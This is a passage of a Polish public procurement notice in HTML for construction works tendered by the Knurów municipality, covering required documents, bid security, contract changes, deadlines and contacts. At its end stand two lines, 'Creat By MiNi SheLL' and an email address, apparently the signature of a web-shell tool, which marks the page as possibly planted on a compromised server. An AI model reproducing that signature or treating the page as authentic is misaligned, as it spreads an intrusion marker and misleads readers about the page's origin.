wartości<br/>w walucie innej niż PLN, Wykonawca powinien dokonać przeliczenia na PLN wg średniego kursu NBP z dnia, w którym ogłoszenie o zamówieniu zostało opublikowane w Biuletynie Zamówień Publicznych (dalej BZP). W przypadku, gdy w dokumentach, o których mowa wyżej w lit. a) wskazane zostaną przez Wykonawcę wartości w walucie innej niż PLN, wartości te zostaną przeliczone na PLN wg kursu średniego NBP na dzień, w którym ogłoszenie o zamówieniu zostało opublikowane w BZP. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w BZP nie będzie opublikowana tabela kursów walut NBP, przyjęty zostanie do przeliczenia na PLN kurs z ostatniej opublikowanej tabeli kursów NBP przed dniem publikacji ogłoszenia o zamówieniu w BZP.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) oświadczenie Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 PZP, o braku przynależności do tej samej <br/>grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów <br/>z innym Wykonawcą, który złożył odrębną ofertę, albo oświadczenia o przynależności do tej samej <br/>grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, <br/>niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej; Wzór oświadczenia <br/>znajduje się w Załączniku nr 6 do SWZ. b) zaświadczenie właściwego naczelnika urzędu skarbowego <br/>potwierdzające, że Wykonawca nie zalega z opłacaniem podatków i opłat, w zakresie art. 109 ust. 1 pkt <br/>1 PZP, wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z <br/>opłacaniem podatków lub opłat wraz z zaświadczeniem Zamawiający żąda złożenia dokumentów <br/>potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał <br/>płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł <br/>wiążące porozumienie w sprawie spłat tych należności; c) zaświadczenie albo inny dokument właściwej <br/>terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub właściwego oddziału <br/>regionalnego lub właściwej placówki terenowej Kasy Rolniczego Ubezpieczenia Społecznego <br/>potwierdzające, że Wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne <br/>i zdrowotne, w zakresie art. 109 ust. 1 pkt 1 PZP, wystawione nie wcześniej niż 3 miesiące przed jego <br/>złożeniem, a w przypadku zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne <br/>wraz z zaświadczeniem albo innym dokumentem Zamawiający żąda złożenia dokumentów <br/>potwierdzających, że odpowiednio przed upływem terminu składania ofert Wykonawca dokonał <br/>płatności należnych składek na ubezpieczenia społeczne lub zdrowotne wraz odsetkami lub grzywnami <br/>lub zawarł wiążące porozumienie w sprawie spłat tych należności; d) odpis lub informacja z Krajowego <br/>Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o Działalności Gospodarczej, w zakresie art. <br/>109 ust. 1 pkt 4 PZP, sporządzone nie wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne <br/>przepisy wymagają wpisu do rejestru lub ewidencji; e) Jeżeli Wykonawca ma siedzibę lub miejsce <br/>zamieszkania poza granicami Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa wyżej <br/>w lit. b), lit. c) i lit. d) składa dokument lub dokumenty wystawione w kraju, w którym Wykonawca ma <br/>siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: e.1) nie naruszył obowiązków <br/>dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne, e.2) nie <br/>otwarto jego likwidacji, nie ogłoszono upadłości, jego aktywami nie zarządza likwidator lub sąd, nie <br/>zawarł układu z wierzycielami, jego działalność gospodarcza nie jest zawieszona ani nie znajduje się <br/>on w innej tego rodzaju sytuacji wynikającej z podobnej procedury przewidzianej w przepisach miejsca <br/>wszczęcia tej procedury, - wystawione nie wcześniej niż 3 miesiące przed ich złożeniem. f) Jeżeli w <br/>kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o <br/>których mowa wyżej w lit. e), lub gdy dokumenty te nie odnoszą się do wszystkich przypadków, o <br/>których mowa w art. 109 ust. 1 pkt 1 PZP, zastępuje się je odpowiednio w całości lub w części <br/>dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób <br/>uprawnionych do jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone <br/>pod przysięgą, lub, jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania nie ma <br/>przepisów o oświadczeniu pod przysięgą, złożone przed organem sądowym lub <br/>administracyjnym,notariuszem, organem samorządu zawodowego lub gospodarczego, właściwym ze <br/>względu na siedzibę lub miejsce zamieszkania Wykonawcy - wystawione nie wcześniej niż 3 miesiące <br/>przed ich złożeniem.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Oświadczenia i dokumenty składane wraz z ofertą: a) Pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika z innych dokumentów złożonych wraz z ofertą, b) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru, dotyczące Wykonawcy/ Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Podmiotu udostępniającego zasoby, Podwykonawcy. c) Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 PZP, także oświadczenie podmiotu udostępniającego zasoby, potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby. Wzór oświadczenia stanowi Załącznik nr 1b do SWZ. d) Wykonawca, w przypadku zamiaru powierzenia wykonania części zamówienia Podwykonawcy niebędącego podmiotem udostępniającym zasoby (jeżeli jest już znany), przedstawia, wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 PZP, także oświadczenie Podwykonawcy, potwierdzające brak podstaw wykluczenia tego Podwykonawcy z postępowania. Wzór oświadczenia stanowi Załącznik nr 1c do SWZ. e) Wykonawca, w przypadku polegania na zdolnościach podmiotów udostępniających zasoby, przedstawia zobowiązanie podmiotów udostępniających zasoby lub inny podmiotowy środek dowodowy potwierdzający, że Wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, o których mowa w Rozdz. 4 ust. 9 SWZ, zawierające w szczególności informacje wymienione w Rozdz. 4 ust. 10 SWZ, z zastrzeżeniem Rozdz. 4 ust. 12 SWZ. Wzór zobowiązania podmiotu udostępniającego zasoby stanowi Załącznik nr 4 do SWZ . 2. Składanie dokumentów na wezwanie: a) Wykonawca, który polega na zdolnościach podmiotów udostępniających zasoby na zasadach określonych w art. 118 PZP, zobowiązany jest przedstawić w odniesieniu do tych podmiotów dokumenty wymienione w Rozdz. 5 ust. 2 pkt 1) lit. b) do d) SWZ. b) Wykonawca, który zamierza powierzyć wykonanie części zamówienia wskazanych w ofercie Podwykonawcom, nie będących podmiotami udostępniającymi zasoby na zasadach określonych w art 118 PZP, zobowiązany jest przedstawić w odniesieniu do tych podmiotów dokumenty wymienione w Rozdz. 5 ust. 2 pkt 1) lit. b) do d) SWZ. c) W przypadku Wykonawców wspólnie ubiegających się o zamówienie dokumenty wymienione w Rozdz. 5 ust. 2 pkt 1) lit. a) do d) SWZ składa każdy z tych Wykonawców. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca przystępujący do przetargu winien wnieść wadium w wysokości 2000,00 zł (słownie: dwa tysiące zł).<br/> 2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2 i 3 oraz ust. 2 PZP.<br/> 3. Wadium może być wniesione w jednej lub kilku formach, o których mowa w art. 97 ust. 7 PZP.<br/> 4. Wadium wnoszone w formie pieniądza wnosi się przelewem na rachunek bankowy Zamawiającego w: GETIN NOBLE Bank S.A., konto nr 67 1560 1081 2121 0517 3581 0006, z dopiskiem wadium – nr referencyjny postępowania. Za termin wniesienia wadium uważa się termin uznania rachunku bankowego Zamawiającego. <br/> 5. Wadium w pieniądzu przechowywane jest na rachunku bankowym.<br/> 6. Jeżeli wadium jest wnoszone w formie gwarancji lub poręczenia, o których mowa w art. 97 ust. 7 pkt 2-4 PZP, Wykonawca przekazuje Zamawiającemu oryginał gwarancji lub poręczenia, w postaci elektronicznej. Wadium nie może zawierać klauzuli zwalniającej gwaranta lub poręczyciela od odpowiedzialności wskutek zwrotu oryginału dokumentu gwarancyjnego do gwaranta lub poręczyciela.<br/> 7. Wadium wnoszone w formie gwarancji lub poręczenia winno:<br/> 1) być wystawione na Gminę Knurów, ul. dr. Floriana Ogana 5, 44-190 Knurów,<br/> 2) wskazywać nr i nazwę postępowania,<br/> 3) zawierać zobowiązanie Gwaranta lub Poręczyciela do nieodwołalnego i bezwarunkowego zapłacenia kwoty wadium na pierwsze pisemne żądanie zapłaty Zamawiającego, w przypadku zaistnienia co najmniej jednego z warunków zatrzymania wadium określonego w ustawie z dnia 11 września 2019 r. Prawo zamówień publicznych.<br/> 4) Gwarant (Poręczyciel) nie może uzależniać dokonania zapłaty od spełnienia jakichkolwiek dodatkowych warunków lub od przedłożenia jakiejkolwiek dokumentacji.<br/> 5) termin obowiązywania gwarancji lub poręczenia nie może być krótszy niż termin związania ofertą.<br/> 6) w przypadku gdy, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia wnoszą wadium w postaci gwarancji lub poręczenia to z ich treści musi wynikać, że odnoszą się one zarówno do zleceniodawcy gwarancji lub poręczenia jak i wszystkich pozostałych Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/> 8. Zaleca się aby dokument wadialny (gwarancje lub poręczenia), stanowił osobny plik opatrzony nazwą „Wadium_[nr referencyjny postępowania]” złożony wraz z ofertą i innymi dokumentami w jednym pliku archiwum (.zip).<br/> 9. Oferta Wykonawcy, który nie wniósł wadium, lub wniósł w sposób nieprawidłowy lub nie utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub złożył wniosek o zwrot wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 PZP, zostanie odrzucona na podstawie art. 226 ust. 1 pkt 14) PZP.<br/> 10. Zamawiający zwróci wadium na zasadach i w okolicznościach wskazanych w art. 98 PZP. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku <br/>Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do <br/>reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. 2) Do oferty <br/>Wykonawcy wspólnie ubiegający się o udzielenie zamówienia zobowiązani są załączyć: a) <br/>Pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o <br/>udzielenie zamówienia, ewentualnie umowa o współdziałaniu, z której będzie wynikać <br/>przedmiotowe pełnomocnictwo. b) Oświadczenie, o którym mowa w art. 125 ust. 1 PZP, składa <br/>każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie <br/>warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje <br/>spełnianie warunków udziału w postępowaniu. Wzór oświadczenia stanowi Załącznik nr 1a do <br/>SWZ. c) Wykonawcy składają oświadczenie, o którym mowa w art. 117 ust. 4 PZP, <br/>Wykonawców wspólnie ubiegających się o udzielenie zamówienia, w zakresie określonym w <br/>Rozdz. 4 ust. 7 SWZ, z którego wynika, które usługi wykonają poszczególni Wykonawcy. Wzór <br/>oświadczenia stanowi Załącznik nr 5 do SWZ. d) Odpis lub informację z Krajowego Rejestru <br/>Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego <br/>rejestru, dotyczące każdego z Wykonawców wspólnie ubiegających się o udzielenie <br/>zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wzór umowy stanowi Załącznik nr 3 do SWZ.<br/> 2. Zmiana postanowień umowy zawartej w wyniku niniejszego postępowania w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, dopuszczalna jest w następujących przypadkach:<br/> 1) zmiany osób do nadzoru, o których mowa w § 1 ust. 6 i 7 wzoru umowy;<br/> 2) działania siły wyższej. Dla potrzeb umowy „siła wyższa” oznacza zdarzenie, którego wystąpienie jest niezależne od Stron umowy i któremu nie mogą zapobiec przy zachowaniu należytej staranności. Zmiana umowy wynikająca z powyższych okoliczności nie może wykraczać poza to, co jest konieczne w celu przeciwdziałaniu skutkom takiego zdarzenia;<br/> 3) wad i braków w dokumentacji projektowej wyszczególnionej w § 1 ust. 2 wzoru umowy,<br/> 4) zmiany terminów realizacji z uwagi na:<br/> a) przedłużające się niekorzystne warunki atmosferyczne zgodnie z opisem w § 9 ust. 10 pkt. 4) lit. a) wzoru umowy,<br/> b) przedłużające się ponad terminy wskazane w umowie procedury uzgodnień z Zamawiającym, w tym między innymi związane z uzgodnieniem zastosowanych materiałów lub ze zmianą rozwiązań projektowych, oraz wyrażenia zgody na zlecenie robót budowlanych w podwykonawstwie, akceptację umowy o podwykonawstwie lub jej zmian,<br/> c) wystąpienia okoliczności, o których mowa w § 5 pkt. 9 wzoru umowy,<br/> d) konieczność wykonania robót (np.: niezbędnych remontów lub wykonania nowych przyłączy ) przez właścicieli infrastruktury technicznej,<br/> e) wystąpienia robót dodatkowych spełniających wymagania określone w art. 455 ust. 1 pkt. 4 lub ust. 2 PZP,<br/> f) wstrzymanie robót ze względu na wystąpienie kolizji z dotychczasowym uzbrojeniem (nie wykazanym lub inaczej wykazanym w projekcie) oraz aktualizacji uzgodnień branżowych w tym również zmian wymagań wprowadzanych do tych aktualizacji),<br/> 5) zmiany zakresu i wynagrodzenia na skutek:<br/> a) ograniczenia zakresu przedmiotu umowy w przypadku, o którym mowa w § 5 ust. 8 wzoru umowy,<br/> b) wprowadzenia rozwiązań zamiennych i robót zamiennych, o których mowa w § 5 ust. 6 wzoru umowy, pod warunkiem, iż zmiany te zostaną zaakceptowane przez Zamawiającego, w tym zmniejszenia lub zwiększenia wynagrodzenia.<br/> c) konieczności wykonania remontu lub odtworzenia istniejącej infrastruktury technicznej należącej do Zamawiającego w pasie prowadzonych robót, a nie powstałych z winy Wykonawcy;<br/> d) ustawowej zmiany stawki podatku VAT. W przypadku zmiany w okresie obowiązywania umowy stawki podatku VAT na roboty objęte przedmiotem umowy, Zamawiający dopuszcza możliwość zmiany wynagrodzenia brutto Wykonawcy określonego w § 5 ust. 1 wzoru umowy Zmiana może dotyczyć jedynie faktur wystawionych po wejściu w życie przepisów zmieniającej wysokość stawki podatku VAT. W takim przypadku wynagrodzenie netto Wykonawcy pozostaje bez zmian, a wynagrodzenie brutto ulegnie zmianie.<br/> e) wystąpienia robót dodatkowych spełniających wymagania określone w art. 455 ust. 1 pkt. 4 lub ust. 2 PZP<br/> 3. Zmiany, o których mowa powyżej w ust. 2 dopuszczone są pod następującymi warunkami:<br/> 1) wprowadzanie zmian wymaga formy pisemnej pod rygorem nieważności;<br/> 2) zmiany mogą być wprowadzone na podstawie udokumentowanego wniosku i zaakceptowaniu go przez drugą Stronę umowy;<br/> 3) zmiany nie mogą pogarszać sytuacji Zamawiającego w stosunku do warunków na jakich umowa została zawarta;<br/> 4) Wykonawcy nie przysługuje roszczenie o wprowadzanie zmian. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-06-08 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-06-08 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-07-07</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wyznacza się następujące osoby do kontaktu z Wykonawcami: 1) Kornelia Loch - Naczelnik<br/>Wydziału Zamówień Publicznych UM Knurów, tel. 32 339-23-08, 2) Julita Macionczyk - Inspektor<br/>w Wydziale Zamówień Publicznych UM Knurów, tel. 32 339-23-06, e-mail: zp@knurow.pl lub <br/>julitam@mail.knurow.eu</main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-05-21 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com